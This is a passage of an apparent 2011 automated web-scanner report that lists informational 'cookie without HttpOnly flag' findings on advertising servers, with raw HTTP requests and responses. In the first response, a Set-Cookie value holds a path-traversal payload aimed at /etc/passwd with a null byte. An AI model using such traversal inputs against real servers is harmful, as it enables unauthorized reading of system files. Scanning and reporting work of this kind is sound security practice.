GET /adj/cm.rev_bostonherald/;sz=728x90;ord=%23PCACHEBUSTER? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=41899200&rk1=79777040&rk2=1316239703.524&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 430
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:48:43 GMT
Connection: close
Set-Cookie: dc=sea-dc..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00sea-dc; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:48:43 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" lang
...[SNIP]...

12.39. http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/iblocal.revinet.bostonherald/audience

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/iblocal.revinet.bostonherald/audience;sz=300x250;ord=%23PCACHEBUSTER? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 453
Date: Sat, 17 Sep 2011 01:00:33 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=sea-dc; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:00:33 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" lang
...[SNIP]...

12.40. http://a.collective-media.net/adj/q1.bosherald/be_news  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.bosherald/be_news

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/q1.bosherald/be_news;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/news/columnists/article/L48/2190420/Middle1/BostonHerald/quadrant1_newsROS300x250b_2010/quadrant1_newsROS300x250b_2010.html/4d686437616b35776e72734144666853?;ord=2190420? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/news/columnists/view.bg?articleid=1366212
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 424
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:01:04 GMT
Connection: close
Set-Cookie: dc=sea-dc; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:01:04 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" lang
...[SNIP]...

12.41. http://a.collective-media.net/adj/q1.bosherald/ent_fr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.bosherald/ent_fr

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/q1.bosherald/ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/298814777/Middle/BostonHerald/quadrant1_entHP300x250a_2010/quadrant1_edgeHP300x250a_0608.html/4d686437616b35776e72734144666853?;ord=298814777? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 425
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:03:36 GMT
Connection: close
Set-Cookie: dc=sea-dc; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:03:36 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" lang
...[SNIP]...

12.42. http://a.collective-media.net/adj/q1.bosherald/news  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.bosherald/news

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/q1.bosherald/news;sz=728x90;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/news/regional/article/L46/293816110/Top/BostonHerald/quadrant1_newsROS728x90a_2010/quadrant1_newsROS728x90a_0608.html/4d686437616b35776e72734144666853?;ord=293816110? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 422
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:00:30 GMT
Connection: close
Set-Cookie: dc=sea-dc; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:00:30 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" lang
...[SNIP]...

12.43. http://a.collective-media.net/cmadj/cm.rev_bostonherald/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/cm.rev_bostonherald/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cmadj/cm.rev_bostonherald/;sz=728x90;net=cm;ord=%23PCACHEBUSTER;env=ifr;ord1=40053;cmpgurl=http%253A//bostonherald.com/includes/processAds.bg%253Fposition%253DTop%2526companion%253DTop%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Finside_track%25252Farticle? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=41899200&rk1=79777040&rk2=1316239703.524&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 8274
Date: Sat, 17 Sep 2011 01:48:46 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...

12.44. http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/iblocal.revinet.bostonherald/audience

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cmadj/iblocal.revinet.bostonherald/audience;sz=300x250;net=iblocal;ord=%23PCACHEBUSTER;env=ifr;ord1=937270;cmpgurl=http%253A//bostonherald.com/news/regional/view.bg%253Farticleid%253D1366356%2526position%253D1? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7334
Date: Sat, 17 Sep 2011 01:00:33 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps
...[SNIP]...

12.45. http://a.collective-media.net/cmadj/q1.bosherald/be_news  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.bosherald/be_news

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cmadj/q1.bosherald/be_news;sz=300x250;net=q1;ord=2190420?;ord1=802665;cmpgurl=http%253A//bostonherald.com/news/columnists/view.bg%253Farticleid%253D1366212? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/news/columnists/view.bg?articleid=1366212
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7290
Date: Sat, 17 Sep 2011 01:01:04 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps
...[SNIP]...

12.46. http://a.collective-media.net/cmadj/q1.bosherald/ent_fr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.bosherald/ent_fr

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cmadj/q1.bosherald/ent_fr;sz=300x250;net=q1;ord=298814777?;env=ifr;ord1=650838;cmpgurl=http%253A//bostonherald.com/track/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7295
Date: Sat, 17 Sep 2011 01:03:36 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps
...[SNIP]...

12.47. http://a.collective-media.net/cmadj/q1.bosherald/news  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.bosherald/news

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cmadj/q1.bosherald/news;sz=728x90;net=q1;ord=293816110?;env=ifr;ord1=121420;cmpgurl=http%253A//bostonherald.com/news/regional/view.bg%253Farticleid%253D1366356%2526position%253D1? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7295
Date: Sat, 17 Sep 2011 01:00:30 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps
...[SNIP]...

12.48. http://a.tribalfusion.com/i.cid  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /i.cid

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /i.cid?c=293233&d=30&page=landingPage HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://www.att.com/u-verse/availability/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=OptOut

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 206
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Tue, 14-Sep-2021 01:10:21 GMT;
Content-Type: text/html
Location: /z/i.cid?c=293233&d=30&page=landingPage
Content-Length: 36
Connection: keep-alive

<h1>Error 302 Moved Temporarily</h1>

12.49. http://a.tribalfusion.com/j.ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /j.ad

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /j.ad?site=pubmaticae&adSpace=audienceselect&tagKey=117090495&th=37103964303&tKey=undefined&size=1x1&flashVer=10&ver=1.21&center=1&url=http%3A%2F%2Fads.pubmatic.com%2FAdServer%2Fjs%2Fsyncuppixels.html%3Fp%3D27330%26s%3D27331&f=2&p=19262702&a=1&rnd=19258315 HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/HostedThirdPartyPixels/TF/ae_12232010.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=OptOut

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Tue, 14-Sep-2021 01:00:33 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 371
Expires: 0
Connection: keep-alive

document.write('<center><a target=_blank href="http://a.tribalfusion.com/h.click/a2mMQgmdIyVdf8XFMkXrbh0qZaMPrFAWb3SVdF3nrZbnRUbsYaJy5aUl2avQnTFLXUfaTtjXmPbLmGMmmHnJ3TZbe5t6m3mBGmUjZd0GnPXsF21GbOnab43
...[SNIP]...

12.50. http://a.tribalfusion.com/z/i.cid  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /z/i.cid

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /z/i.cid?c=293233&d=30&page=landingPage HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://www.att.com/u-verse/availability/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=OptOut

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 307
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Tue, 14-Sep-2021 01:10:23 GMT;
Content-Type: image/gif
Content-Length: 43
Connection: keep-alive

GIF89a.............!.......,........@..D..;

12.51. http://ad.doubleclick.net/adj/N5739.140101.AD.COM/B5822790.2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5739.140101.AD.COM/B5822790.2

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/N5739.140101.AD.COM/B5822790.2;sz=728x90;pc=[TPAS_ID];click=http://r1-ads.ace.advertising.com/click/site=0000804034/mnum=0001076846/cstr=48830520=_4e73ef55,7812332526,804034%5E1076846%5E1184%5E0,1_/xsxdata=$XSXDATA/bnum=48830520/optn=64?trg=;ord=7812332526? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?wT8nBZMQIwBWUEQAAAAAAEAgEgAAAAAAAgAAAAYAAAAAAP8AAAAGFEz4GAAAAAAAUvgYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD1DhMAAAAAAAIAAgAAAAAAmpmZmZmZ2T-amZmZmZnZP5qZmZmZmdk.mpmZmZmZ2T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABMCYyQztO8ClmeR2rwo8Ab3j-oNvoGtMiyJOdrAAAAAA==,,http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F221%2Ftmz%2F728x90%2Fhomepage_btf%3Ft%3D1316238825238,Z%3D728x90%26_salt%3D2029454794%26anmember%3D514%26anprice%3D%26fo%3D%26hp%3D0%26ht%3Djs%26hu%3D%26m%3D0%26r%3D0%26refer%3D%26s%3D2298003%26tz%3D300%26url%3Dhttp%253A%252F%252Fwww.tmz.com%252F,5257a1a2-e0c7-11e0-91e5-78e7d15f7c8c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6515
Set-Cookie: id=c55c63c3c0000db||t=1316220818|et=730|cs=002213fd48aa589fa00fdf2f13; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 00:53:38 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 00:53:38 GMT
Date: Sat, 17 Sep 2011 00:53:38 GMT
Expires: Sat, 17 Sep 2011 00:53:38 GMT
Cache-Control: private

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Aug 30 10:41:29 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...

12.52. http://ad.doubleclick.net/adj/N5739.140101.AD.COM/B5822790.3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5739.140101.AD.COM/B5822790.3

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/N5739.140101.AD.COM/B5822790.3;sz=300x250;pc=[TPAS_ID];click=http://r1-ads.ace.advertising.com/click/site=0000791296/mnum=0001076845/cstr=67593853=_4e73f069,2688307180,791296%5E1076845%5E1184%5E0,1_/xsxdata=$XSXDATA/bnum=67593853/optn=64?trg=;ord=2688307180? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/passback/iframe/221/tmz/300x250/6/meld.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6524
Set-Cookie: id=cf7ce3c3c0000a4||t=1316221290|et=730|cs=002213fd48760c6e5221f8bafc; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 01:01:30 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 01:01:30 GMT
Date: Sat, 17 Sep 2011 01:01:30 GMT
Expires: Sat, 17 Sep 2011 01:01:30 GMT
Cache-Control: private

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Aug 30 10:37:58 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...

12.53. http://ad.doubleclick.net/adj/q1.bosherald/be_news  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/q1.bosherald/be_news

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/q1.bosherald/be_news;net=q1;u=,q1-30505236538_1316221208,,polit,;;cmw=owl;sz=300x250;net=q1;env=ifr;ord1=36513;contx=polit;dc=s;btg=;ord=2118037356?? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 267
